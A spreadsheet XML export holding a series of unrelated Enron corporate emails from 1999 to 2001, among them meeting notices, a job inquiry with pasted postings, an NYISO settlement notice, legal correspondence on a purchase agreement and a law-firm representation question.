    <t xml:space="preserve">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Tuesday, December  11, 2001=_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                  =20_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
            (Trade Date of Monday, December  10, 2001)                     =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                        =20_x000D_
Click here to access index history</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 04:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/4/01; HourAhead hour: 9;  HourAhead schedule download failed. _x000D_
Manual intervention required._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001040409.txt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Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!An error occurred while attempting to initialize the Borland Database _x000D_
Engine (error $2A04)_x000D_
Error: Crawler lifetime exceeded._x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database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t>
  </si>
  <si>
    <t>Mon, 21 May 2001 10:12:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>is it still snowing?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Tom Lenhart" &lt;tlenhart@corealty.com&gt;@ENRON [mailto:IMCEANOTES-+22Tom+20Lenhart+22+20+3Ctlenhart+40corealty+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Monday, May 21, 2001 11:10 AM_x000D_
To:	Lenhart, Matthew_x000D_
Subject:	RE:_x000D_
_x000D_
i think they will play better tonight. they need to win tonight, they_x000D_
haven't played real well in st.louis._x000D_
_x000D_
-----Original Message-----_x000D_
From: Lenhart, Matthew [mailto:Matthew.Lenhart@ENRON.com]_x000D_
Sent: Monday, May 21, 2001 9:49 AM_x000D_
To: tlenhart@corealty.com_x000D_
Subject:_x000D_
_x000D_
_x000D_
do you think the avs will close out the blues tonight?  they haven't_x000D_
looked too good the last two games.</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 04:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'colleen.koenig@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'rsaltiel@enron.com'})</t>
  </si>
  <si>
    <t>Request for Enron Spend Data</t>
  </si>
  <si>
    <t xml:space="preserve">Rob,_x000D_
Per Jennifer Stewart Medcalf's request, attached are files containing Enron _x000D_
spends between $5MM-500K, for 1999 and Q1Q2 2000._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Colleen Koenig_x000D_
Analyst_x000D_
Global Strategic Sourcing_x000D_
713.345.5326 </t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 15:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Account Information for E210-1: Competitive Strategy</t>
  </si>
  <si>
    <t xml:space="preserve">Of course, I'd love to hear that I made if off the waiting list.  Could it be _x000D_
true?  Could you let me know.  Thanks._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	IzioSystem@convene.com_x000D_
	01/15/2001 06:55 PM_x000D_
		 _x000D_
		 To: dasovich@haas.berkeley.edu_x000D_
		 cc: _x000D_
		 Subject: Account Information for E210-1: Competitive Strategy_x000D_
_x000D_
Dear Jeffrey,_x000D_
                        _x000D_
William Starks has just added you to their course, E210-1: Competitive _x000D_
Strategy._x000D_
_x000D_
If you feel that this is an error, please email them at _x000D_
willstar@haas.berkeley.edu._x000D_
_x000D_
If you have any suggestions or questions, please don't hesitate to write us _x000D_
at IzioSupport@convene.com._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
The Izio Team._x000D_
            _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Jul 2000 09:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron open positions</t>
  </si>
  <si>
    <t xml:space="preserve">                            Dear Mr. Kaminski:_x000D_
_x000D_
                            I would  like to explore the opportunity to join _x000D_
Enron Investment Partners. I understand that Enron has $20 million fund set _x000D_
up to finance start-ups, and Gene Humphreys and his assistant John Godbold _x000D_
are trying to attract minority -owned start-up firms. I also learned that _x000D_
Enron has plans to increase the size of this fund to $200 million. I can find _x000D_
these opportunities for Enron around the Globe. Given my background as a _x000D_
Chartered Financial Analyst, with hands-on experience in investment _x000D_
management covering financial derivatives, fixed income, and equity, I can be _x000D_
a valuable resource to do the due diligence, origination, valuation, and _x000D_
monitoring of these start-ups. Would you please help me arrange a meeting _x000D_
with either Gene Humphreys, Ted Murphy, or may be Ken Lay?_x000D_
_x000D_
I am pasting below the job opportunities open at Enron. I am also interested _x000D_
in these positions and would like to meet with the hiring manager._x000D_
_x000D_
I will give you a call to follow up._x000D_
_x000D_
Thank you._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
_x000D_
Maruti More_x000D_
832-251-7267_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
            job 0000104282 details_x000D_
_x000D_
              MANAGER/DIRECTOR_x000D_
            ESSENTIAL FUNCTIONS: Candidates will be responsible for helping _x000D_
facilitate the transaction approval process for domestic and international _x000D_
investments. These investments include, but are not limited to, private _x000D_
equity, project development, venture capital, and structured credits. _x000D_
Candidates will work with business developers and underwriters in _x000D_
identifying, understanding, and documenting transaction risks. They will also _x000D_
assist in preparing transaction approval documentation. In addition, they _x000D_
will oversee the valuation, modeling, and simulation process for investments. _x000D_
The primary focus is to identify and measure key risk factors from both a _x000D_
quantitative and a qualitative perspective with an emphasis on fundamental _x000D_
analysis. The candidate must be able to assist in management and training of _x000D_
departmental staff and in formulation of investment valuation policies and _x000D_
procedures._x000D_
            ESSENTIAL REQUIREMENTS: ? Strong interpersonal skills ? _x000D_
Understanding of transaction structuring and credit risk issues ? _x000D_
Understanding of finance and valuation methodologies. ? Proficiency with _x000D_
Excel cash flow models ? Experience with financial statement analysis ? _x000D_
Understanding of statistics and simulation techniques (Monte Carlo)._x000D_
_x000D_
            PREFERRED SKILLS: NA._x000D_
_x000D_
            SPECIAL CHARACTERISTICS: The ideal candidate will possess an _x000D_
undergraduate degree in finance, accounting, or economics, and an MBA. _x000D_
Relevant experience could include credit analysis or valuation/finance _x000D_
experience. Manager/Director in the Risk Assessment department of a $20 _x000D_
billion energy company._x000D_
_x000D_
            CONTACT: PLEASE EMAIL RESUMES TO corpjobs1@enron.com, PLEASE _x000D_
REFER TO JOB NO.104282 WHEN RESPONDING._x000D_
_x000D_
_x000D_
            Job ID  0000104282_x000D_
                        Department  CAPITAL PRICING / RISK AN_x000D_
                        Company  CORPORATE STAFF_x000D_
                        RISK ASSESSMENT AND CONTROL_x000D_
                        Location  HOUSTON, TX_x000D_
                        Type_x000D_
                        Posting date 05-JUN-00_x000D_
_x000D_
_x000D_
_x000D_
            To submit your resume for this position:_x000D_
            Online Enter your resume ID: No Resume ID?  You can create a _x000D_
resume on-line, deposit it in our database, and receive a Resume ID using our _x000D_
Resume Builder._x000D_
_x000D_
                        Your Resume ID will allow you to submit your resume _x000D_
once, but route it to up to 20 open positions.Enron does not process resumes _x000D_
that are not sent in response to specific positions._x000D_
_x000D_
                        If you have an existing resume in electronic format, _x000D_
the Resume Builder allows you to cut and paste your whole resume._x000D_
_x000D_
                        Fax Our fax number is 1-888-588-7152._x000D_
                        You must tell us which jobs you're interested in, or _x000D_
we will not be able to process your resume.Write on your resume (or on a _x000D_
separate page) all of the jobs IDs of the jobs you're interested in pursuing._x000D_
_x000D_
_x000D_
            An Equal Opportunity and Affirmative Action Employer_x000D_
_x000D_
_x000D_
            _x000D_
--------------------------------------------------------------------     _x000D_
_x000D_
            Top of page  Copyright 1997-1999 Enron Corp. All rights _x000D_
reserved.  Contact us._x000D_
_x000D_
_x000D_
job 0000104281 details_x000D_
_x000D_
              STAFF/SPEC/SR SPEC_x000D_
            ESSENTIAL FUNCTIONS: "SNAPSHOT" preparation - Responsible for _x000D_
preparation of quarterly asset "snapshots" which provides Enron's Senior _x000D_
Management with summarized operational and financial information on selected _x000D_
merchant portfolio investments. Responsibilities associated with preparation _x000D_
of snapshots include: researching publicly traded companies, calculating key _x000D_
financial data, updating and analyzing graphical summaries of performance, _x000D_
reviewing press releases for recent events data, updating stock prices from _x000D_
Bloomberg ? WEEKLY UNDERWRITERS REPORT - Full responsibility for updating and _x000D_
distributing weekly Underwriters' Report. Involves regular interaction with _x000D_
Executive Vice President, London office personnel, as well as several Vice _x000D_
Presidents within Underwriting Group within RAC. ? VARIOUS PROJECTS - will be _x000D_
utilized on special projects on an as needed basis_x000D_
            ESSENTIAL REQUIREMENTS: Accounting/Finance/Economics Degree with _x000D_
0 - 4 years business experience. Excellent computer skills - EXCEL, _x000D_
POWERPOINT, Bloomberg, Word Research skills and the ability to interact with _x000D_
a variety of personnel and departments. Excellent organization skills. Self _x000D_
starter, quick learner. Must be team player. Good writing skills with the _x000D_
ability to concisely summarize operational and financial results._x000D_
_x000D_
            PREFERRED SKILLS: NA._x000D_
_x000D_
            SPECIAL CHARACTERISTICS: . Entry level position with the _x000D_
opportunity to gain familiarity with all of Enron's portfolio assets. Future _x000D_
advancement in asset and portfolio management possible for candidate who _x000D_
exhibits competence and creativity._x000D_
_x000D_
            CONTACT: PLEASE EMAIL RESUMES TO enajobs1@enron.com, PLEASE REFER _x000D_
TO JOB NO. 104281 WHEN RESPONDING._x000D_
_x000D_
_x000D_
            Job ID  0000104281_x000D_
                        Department  DUE DILIGENCE/ASSET MGMT_x000D_
                        Company  CORPORATE STAFF_x000D_
                        RISK ASSESSMENT AND CONTROL_x000D_
                        Location  HOUSTON, TX_x000D_
                        Type_x000D_
                        Posting date 05-JUN-00_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
            job 0000102789 details_x000D_
_x000D_
              SR SPECIALIST_x000D_
            ESSENTIAL FUNCTIONS: In this position candidates will model, run _x000D_
monte-carlo simulations, evaluate capital investments. These investments will _x000D_
cover a wide range. Candidates will be responsible for the validation of _x000D_
models as well as insuring the accuracy and integrity of the model and _x000D_
underlying assumptions. The primary focus will be to provide an objective _x000D_
valuation for an investment by identifying and measuring key risk factors _x000D_
from both a quantitative as well as qualitative perspective. ? Understanding _x000D_
of valuation techniques applied to equity or structured financial products. ? _x000D_
Understanding of cash flow models and option pricing models. ? Proficiency in _x000D_
Excel. ? Understanding of project finance and risk mitigation techniques. ? _x000D_
Experience with financial statement analysis and Pro Forma Statements. ? _x000D_
Understanding of statistics and application to financial analysis._x000D_
            ESSENTIAL REQUIREMENTS: NA._x000D_
_x000D_
            PREFERRED SKILLS: ? Understanding of simulation methodologies _x000D_
such as MonteCarlo. ? Exposure to statistical analysis software such as _x000D_
Crystal Ball or @Risk. The ideal candidate will possess an undergraduate _x000D_
degree in finance, accounting, or economics and have 2 to 3 years of _x000D_
financial modeling experience and an MBA/CPA._x000D_
_x000D_
            SPECIAL CHARACTERISTICS: NA._x000D_
_x000D_
            CONTACT: PLEASE DO NOT CONTACT THE HIRING MANAGER. PLEASE NO _x000D_
FAXES. Send resumes via e-mail to corpjobs1@enron.com or mail to Enron, attn: _x000D_
TVasut - EB3628, 1400 Smith St., Houston, TX 77002. Please refer to job # _x000D_
102789_x000D_
_x000D_
_x000D_
            Job ID  0000102789_x000D_
                        Department  CAPITAL PRICING / RISK AN_x000D_
                        Company  CORPORATE STAFF_x000D_
                        RISK ASSESSMENT AND CONTROL_x000D_
                        Location  HOUSTON, TX_x000D_
                        Type_x000D_
                        Posting date 17-MAR-00_x000D_
_x000D_
_x000D_
_x000D_
 - att1.htm</t>
  </si>
  <si>
    <t>Wed, 3 Oct 2001 13:18:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'market_relations@nyiso.com'})</t>
  </si>
  <si>
    <t>November &amp; December 1999 Settlement Adjustments</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
market_relations@nyiso.com writes to the NYISO_TECH_EXCHANGE Discussion List:_x000D_
_x000D_
Dear Market Participants:_x000D_
_x000D_
On the November 1999 &amp; December 1999 Transmission Customer Monthly_x000D_
Statements many customers have noted under the "Energy Settlement" section_x000D_
for "Forward Energy" a change in MW-Hrs with no associated change in dollar_x000D_
amounts.  This is because of a correction in the sign convention for the_x000D_
MW-Hrs related to external generation transactions (transactions from a_x000D_
proxy bus to the NYISO reference bus).  For all other types of transactions_x000D_
the NYISO charges customers the appropriate TUC or LBMP  based on the MWs_x000D_
that flowed, but for external generation transactions, customers receive_x000D_
payments from the NYISO, and therefore these types of transactions have an_x000D_
opposite sign convention._x000D_
_x000D_
The dollars associated with the external generation transactions have_x000D_
always had the proper sign convention, but the MW-Hrs have not.  On_x000D_
01/17/2000 this sign convention was corrected for all billing months going_x000D_
forward resulting in the correct MW-Hr values being reported from February_x000D_
2000 to date.  However, November 1999 - January 2000 did not have the_x000D_
proper MW-Hrs reported on the Transmission Customer Monthly Statements._x000D_
With the latest settlement adjustments posted the MW-Hrs are being_x000D_
corrected with the proper sign convention.  Transmission Customers will see_x000D_
similar changes in their forward energy MW-Hrs for January 2000's_x000D_
settlement adjustment._x000D_
_x000D_
If you have any questions please contact your Customer Relations_x000D_
representative at 518-356-6060._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 08:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'andy.zipper@enron.com', 'jay.webb@enron.com', 'elizabeth.sager@enron.com', 'leslie.reeves@enron.com', 'thomas.gros@enron.com', 'jeffrey.hodge@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Mtg re: Elimination of Confirmations</t>
  </si>
  <si>
    <t>Date:  Monday, April 30_x000D_
Time:  10:30 - 11:30 AM_x000D_
Location: EB 3270_x000D_
Subject: Review game plan for elimination of confirmations and impact on _x000D_
CommodyLogic_x000D_
_x000D_
Attendees: Sally Beck_x000D_
  Andy Zipper_x000D_
  Jay Webb_x000D_
  Tom Gros_x000D_
  Mark Taylor_x000D_
  Jeff Hodge_x000D_
  Elizabeth Sager_x000D_
  Leslie Reeves_x000D_
_x000D_
Assistants:_x000D_
_x000D_
Please let me know if there is a conflict for this time slot._x000D_
_x000D_
Thanks!_x000D_
Patti x39106</t>
  </si>
  <si>
    <t>Mon, 31 Jul 2000 01:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lance.schuler-legal@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'john.lamb@enron.com', 'david.nutt@enron.com', 'charles.cheek@enron.com', 'patrick.conner@enron.com', 'frank.smith@enron.com', 'bob.butts@enron.com', 'john.novak@enron.com', 'bruce.lundstrom@enron.com', 'james.bouillion@enron.com', 'aaron.brown@enron.com', 'richard.shapiro@enron.com', 'daniel.rogers@enron.com', 'steven.kean@enron.com', 'gail.brownfeld@enron.com', 'frank.sayre@enron.com', 'cullen.duke@enron.com', 'amit.walia@enron.com', 'robert.williams@enron.com', 'mary.joyce@enron.com', 'sandeep.katwala@enron.com', 'robert.george@enron.com', 'eric.newell@enron.com', 'stephen.wallace@enron.com'})</t>
  </si>
  <si>
    <t>Summer Purchase Agreement</t>
  </si>
  <si>
    <t>----- Forwarded by Lance Schuler-Legal/HOU/ECT on 07/31/2000 08:17 AM -----_x000D_
_x000D_
	"Joor, William E., III" &lt;wjoor@velaw.com&gt;_x000D_
	07/30/2000 06:58 PM_x000D_
		 _x000D_
		 To: "'Klepper, Marty'" &lt;mklepper@skadden.com&gt;, "'Tindell, Jeff'" _x000D_
&lt;jtindell@skadden.com&gt;, "'Brasher, Lance'" &lt;lbrasher@skadden.com&gt;, "'Saba, _x000D_
Peter'" &lt;psaba@skadden.com&gt;, "'Cohen, Arthur'" &lt;arcohen@skadden.com&gt;, "'Haug, _x000D_
David'" &lt;dhaug@enron.com&gt;, "'Sutton, Joseph'" &lt;jsutton@enron.com&gt;, "'Brennan, _x000D_
James'" &lt;james.brennan@ubsw.com&gt;, "'Saddi, Joe'" &lt;saddi_joe@bah.com&gt;, _x000D_
"'Walter, Jerry'" &lt;jerry.walter@simmons-simmons.com&gt;, "'Baxter, Cliff'" _x000D_
&lt;cliff.baxter@enron.com&gt;, "Metts, Mark (Enron)" &lt;mmetts@enron.com&gt;, "Taylor, _x000D_
Mitchell (Enron)" &lt;mitchell.taylor@enron.com&gt;, "'Welch, Jamie'" _x000D_
&lt;jamie.welch@csfb.com&gt;, "'Faldyn, Rodney'" &lt;rfaldyn@azurix.com&gt;, "Schuler, _x000D_
Lance (Enron)" &lt;lance.schuler-Legal@enron.com&gt;, "Dilg, Joe" _x000D_
&lt;jdilg@velaw.com&gt;, "Osterberg, Edward" &lt;eosterberg@velaw.com&gt;, "Duke, Cullen _x000D_
(Enron)" &lt;cullen.duke@enron.com&gt;, "Nettles, Larry" &lt;lnettles@velaw.com&gt;, _x000D_
"Bloom, Brian" &lt;bbloom@velaw.com&gt;, "Shouse, August" &lt;AShouse@velaw.com&gt;, _x000D_
"Barber, Shelley" &lt;SBarber@velaw.com&gt;, "Hodges, Ted" &lt;thodges@velaw.com&gt;, _x000D_
"Spradling, Mark" &lt;MSpradling@velaw.com&gt;, "Roark, Donnie" &lt;droark@velaw.com&gt;, _x000D_
"'m.cilia@enron.com'" &lt;m.cilia@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Summer Purchase Agreement_x000D_
_x000D_
_x000D_
Attached please find clean and marked copies of a revised Purchase and Sale_x000D_
Agreement.  There are attached copies in WordPerfect 8.0 and in PDF._x000D_
_x000D_
Two matters require special mention:_x000D_
_x000D_
First, we have been advised that the parties discussed a threshhold with_x000D_
respect to the TGS stamp tax issue of $16 million.  Accordingly, we have_x000D_
amended the definition of the Excluded Liability to limit it to the excess_x000D_
of any TGS liability that would yield that amount proportionately to the_x000D_
Company's ownership interest._x000D_
_x000D_
Second, we have noted that the bifurcation of the materiality standard_x000D_
between materiality as a condition to close and materiality as a condition_x000D_
to indemnification yields an inappropriate result in the case of the_x000D_
representation in Section 5.14 dealing with material adverse changes.  It is_x000D_
our intention to condition the Acquiror's obligation to close on an adverse_x000D_
matter that is material to a Strategic Business Unit.  It was to indemnify_x000D_
the Acquiror with respect to an undisclosed adverse matter that is material_x000D_
to a Strategic Business Unit.  I was not our intention to indemnify the_x000D_
Acquiror with respect to each $4 million change in each Business not covered_x000D_
by the other representations.  Accordingly, we have, in the case of Section_x000D_
5.14, limited the definition of Material Adverse Change to clause (i) of_x000D_
that definition. &lt;&lt;Houston_284555_1.WPD&gt;&gt;  &lt;&lt;Houston_284243_1.WPD&gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
William E. Joor III_x000D_
Vinson &amp; Elkins L.L.P._x000D_
3600 First City Tower_x000D_
1001 Fannin_x000D_
Houston, Texas  77002-6760_x000D_
Tel:  713-758-2582_x000D_
Fax:  713-615-5201_x000D_
wjoor@velaw.com_x000D_
_x000D_
_x000D_
_x000D_
 +++++++++++++++++++++++_x000D_
 CONFIDENTIALITY NOTICE_x000D_
 +++++++++++++++++++++++_x000D_
 The information in this email may be confidential and/or privileged._x000D_
This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 this_x000D_
email in error, please immediately notify the sender by return email and_x000D_
delete this email from your system. Thank You_x000D_
_x000D_
 &lt;&lt;PSA.7.30.00.CMP.PDF&gt;&gt;  &lt;&lt;PSA.7.30.00.PDF&gt;&gt;_x000D_
_x000D_
 - Houston_284555_1.WPD_x000D_
 - Houston_284243_1.WPD_x000D_
 - PSA.7.30.00.CMP.PDF_x000D_
 - PSA.7.30.00.PDF</t>
  </si>
  <si>
    <t>Tue, 21 Dec 1999 07:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>WestPort</t>
  </si>
  <si>
    <t xml:space="preserve">Dan,_x000D_
_x000D_
Here is the latest Westport contract with a few changes I need you to take a _x000D_
look at._x000D_
Also, in Section 8, what are payment securities? They would like this to be _x000D_
defined._x000D_
They also would like Section 9 to be bi-lateral._x000D_
_x000D_
One other question Westport has is - If the delivery point (screw compressor _x000D_
meter) is off the acreage lease, can all the fees be charged back to the _x000D_
royalty owners?_x000D_
I told them you may not want to give an opinion on this and they are alright _x000D_
with that._x000D_
_x000D_
Let me know your thoughts on all the above._x000D_
_x000D_
Mike_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 16:08:27 -0800 (PST)</t>
  </si>
  <si>
    <t>TRV Notification:  (NG - PROPT P/L - 11/20/2001)</t>
  </si>
  <si>
    <t>The report named: NG - PROPT P/L &lt;http://trv.corp.enron.com/linkFromExcel.asp?report_cd=11&amp;report_name=NG+-+PROPT+P/L&amp;category_cd=5&amp;category_name=FINANCIAL&amp;toc_hide=1&amp;sTV1=5&amp;TV1Exp=Y&amp;current_efct_date=11/20/2001&gt;, published as of 11/20/2001 is now available for viewing on the website.</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 02:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michael.kopper@enron.com', 'wes.colwell@enron.com', 'marty.sunde@enron.com', 'george.mcclellan@enron.com', 'brian.redmond@enron.com', 'janet.dietrich@enron.com', 'sally.beck@enron.com', 'james.hughes@enron.com', 'gary.hickerson@enron.com', 'jere.overdyke@enron.com', 'richard.dimichele@enron.com', 'jeff.donahue@enron.com', 'jeffrey.mcmahon@enron.com', 'orlando.gonzalez@enron.com', 'david.delainey@enron.com', 'mark.frevert@enron.com', 'richard.shapiro@enron.com', 'shawn.cumberland@enron.com', 'jay.fitzgerald@enron.com', 'david.oxley@enron.com', 'mark.haedicke@enron.com', 'louise.kitchen@enron.com', 'jeffrey.shankman@enron.com', 'raymond.bowen@enron.com', 'greg.piper@enron.com', 'dan.leff@enron.com', 'mike.mcconnell@enron.com', 'robert.knudsen@enron.com', 'vince.kaminski@enron.com', 'joe.kishkill@enron.com', 'john.lavorato@enron.com', 'philippe.bibi@enron.com', 'greg.whalley@enron.com', 'rebecca.mcdonald@enron.com'})</t>
  </si>
  <si>
    <t>December 11, 2000 EWS PRC Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is an agenda and attendee list for the December 11 Enron Wholesale _x000D_
Services Group PRC meeting.  The first part of this meeting will involve a  _x000D_
review of  the PRC results below VP in ENA, EIM, EGM and ENW, in addition to _x000D_
a discussion and approval of promotion nominations.  The VP preranking will _x000D_
begin at  9:30am and will include preranking of VP's in ENA, EIM, EGM, ENW, _x000D_
CALME, ESA and APACHI._x000D_
_x000D_
Please note on the attendee list which part of the meeting you need to attend._x000D_
_x000D_
The meeting is at the St. Regis Hotel; however, please note a change to the _x000D_
Colonnade Room._x000D_
_x000D_
Should you have any questions regarding this meeting, please contact Sheila _x000D_
Knudsen at X36628 in Houston._x000D_
</t>
  </si>
  <si>
    <t>Fri, 29 Sep 2000 07:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'hea@houstonenergy.org'})</t>
  </si>
  <si>
    <t>frozenset({'mlokay@enron.com'})</t>
  </si>
  <si>
    <t>HEA 34th Sports Tourney - 2 Weeks Away!</t>
  </si>
  <si>
    <t>Michelle Lokay,_x000D_
_x000D_
If you haven't signed up for this year's tournament on October 16th at the _x000D_
Woodlands, you still have time and space is still available in each event.  _x000D_
If you register and pay by Monday, October 2, you'll be automatically entered _x000D_
into a private drawing for a door prize worth approximately $500!_x000D_
_x000D_
Don't miss out!  Make your plans now, and register today by clicking on_x000D_
_x000D_
http:///www.houstonenergy.org/public/sportscover.doc_x000D_
_x000D_
See you in a few weeks!_x000D_
_x000D_
_x000D_
-----------------------------------------------------------_x000D_
This message was sent by:_x000D_
_x000D_
Teresa Knight, Executive Director_x000D_
Houston Energy Association (HEA)_x000D_
Phone: (713) 651-0551_x000D_
Fax: (713) 659-6424_x000D_
tknight@houstonenergy.org_x000D_
_x000D_
_x000D_
If you would like to have your email address removed from our mailing list, _x000D_
please click the link below to the HEA Home page, where you will find a _x000D_
mini-form to remove your name automatically._x000D_
_x000D_
http://www.houstonenergy.org/_x000D_
_x000D_
If you did not receive the attached file or it was corrupted, you can find it _x000D_
at: http://www.houstonenergy.org/public/</t>
  </si>
  <si>
    <t>Fri, 9 Feb 2001 07:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: New Book</t>
  </si>
  <si>
    <t xml:space="preserve">Stacey,_x000D_
_x000D_
I have a couple of questions for you to ensure that we report the positions _x000D_
correctly.  First, is this a Power East or Power West book?  Second, when can _x000D_
we expect to be reporting positions in this book?  Finally, who is the trader _x000D_
for this book?_x000D_
_x000D_
Thanks for your help._x000D_
Robin_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Nancy Hernandez @ ENRON                           02/09/2001 01:33 PM_x000D_
	_x000D_
_x000D_
To: Stacey W White/HOU/ECT@ECT, Robin Rodrigue/HOU/ECT@ECT_x000D_
cc: Burton McIntyre/HOU/ECT@ECT, Susan D Trevino/HOU/ECT@ECT _x000D_
Subject: New Book_x000D_
_x000D_
Stacey:_x000D_
_x000D_
Can you please confirm that new book PWR-NY-GAS-MTM should be included in the _x000D_
AGG-PWRII portfolio for VaR purposes?  Can you further indicate into which _x000D_
subportfolio of AGG_PWRII the book should be added?_x000D_
_x000D_
_x000D_
Robin:_x000D_
_x000D_
In order for you to capture the positions for the GAS bench, does the book _x000D_
need to be included within any GAS portfolio?_x000D_
_x000D_
_x000D_
I look forward to your responses._x000D_
_x000D_
_x000D_
_x000D_
Nancy_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Jul 2001 18:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cguardino@svmg.org'})</t>
  </si>
  <si>
    <t>SAVE THE DATE!       August 24th Energy Efficiency Conference</t>
  </si>
  <si>
    <t xml:space="preserve">Please respond to To All:_x000D_
_x000D_
Please read the attached SAVE THE DATE invitation to our SVMG/City of_x000D_
Cupertino Energy Efficiency Conference in partnership with NRDC._x000D_
_x000D_
California has succeeded well in avoiding blackouts with unprecedented_x000D_
energy efficiency and conservation.  But it is still too early to pop the_x000D_
champagne corks.  It is imperative that we lock in our efficiency gains to_x000D_
be effective stewards of our resources and minimize high energy costs well_x000D_
into the future.  Let us help you do that!_x000D_
_x000D_
I hope that you can attend._x000D_
_x000D_
Best,_x000D_
_x000D_
Carl_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Save the Date Aug. 24 Energy Conference.doc </t>
  </si>
  <si>
    <t>Tue, 14 Dec 1999 08:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alex.huang@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Here is the information on the generation bus point in PJM.  The bus point is _x000D_
Oak Hall._x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 14:56:35 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: In re F&amp;J Representation</t>
  </si>
  <si>
    <t xml:space="preserve">I support your suggestiion._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Davis, Britt  _x000D_
Sent:	Wednesday, November 21, 2001 4:50 PM_x000D_
To:	Derrick Jr., James_x000D_
Cc:	Holsworth, Mark; Armogida, Jim; Bushman, Teresa G.; Haedicke, Mark E.; Vote, Robert_x000D_
Subject:	In re F&amp;J Representation_x000D_
Importance:	High_x000D_
_x000D_
_x000D_
_x000D_
	I have now spoken with the following people in doing further due diligence:_x000D_
_x000D_
	1.  Theresa Bushman.  Theresa tells me that she shares the view with Mariner's GC that it would be helpful to have F&amp;J continue to represent Mariner for the time being, given F&amp;J's knowledge of Mariner's corporate history.  Theresa, if I have mischaracterized what you told me, please respond._x000D_
_x000D_
	2.   Kelly Zelacovitz, Mariner's GC.  Kelly advised me recently that she has a new corporate matter of some urgency that she wants to retain F&amp;J to handle, subject to your approval.  Kelly told me that she would be contacting you about this._x000D_
_x000D_
	3.   Prof. John Dzienkowski of the University School of Law.   John has given me his informal thoughts over the telephone on the ethical issues, based on hypotheticals I presented to him; of course, these are not to be taken as recommendations.  In a nutshell, John thinks it would be problematic for a law firm to unilaterally withdraw from the representation of a corporate client solely and only to be able to take on more business potentially adverse to that client in the future.  John thinks it might be appropriate to ask for a disgorgement of fees paid under these circumstances._x000D_
_x000D_
	4.  Uriel Dutton.  Dutton says that with an appropriate waiver letter, F&amp;J would be willing to continue its representation of Enron and the Enron subsidiaries, including Mariner and the proposed new Mariner matter, conditioned on the following:_x000D_
_x000D_
	a.  F&amp;J could not continue to represent Corp. on  one of the three IP matters, which is the nonprovisional patent application (although Dutton was not specific, I believe F&amp;J lists it as the "Method and System for the Determination of VAR")._x000D_
_x000D_
	b.  F&amp;J would continue to represent Corp. on the six or so abestosis matters in order to try and get Corp. dismissed, but with the understanding that if dismissal was not available, that new representation would be obtained by Corp. before trial._x000D_
_x000D_
